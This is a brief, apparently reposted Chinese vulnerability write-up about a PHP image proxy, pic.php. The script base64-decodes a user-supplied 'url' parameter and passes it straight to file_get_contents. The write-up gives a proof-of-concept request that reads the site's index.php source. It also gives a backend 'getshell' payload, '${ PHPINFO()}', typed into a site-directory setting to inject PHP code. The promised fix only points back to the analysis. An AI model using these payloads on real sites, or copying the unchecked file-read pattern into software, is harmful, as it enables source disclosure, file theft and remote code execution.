pic.php
function url_base64_decode($code)
{
if($code=="")
return "";
$code=str_replace("!",'+',$code);
$code=str_replace(",",'/',$code);
$str=base64_decode($code);
return $str;
}
$url=url_base64_decode($_GET["url"]);
//.... 省略
header("Content-type: image/jpeg");
echo file_get_contents($url);
测试证明:
/pic.php?url=aW5kZXgucGhw
后台GETSHELL
系统基本参数->网站所在目录:->${ PHPINFO()}
修复:
请见上述分析
作者 :t00ls.net
,涛涛电脑知识网,涛涛电脑知识网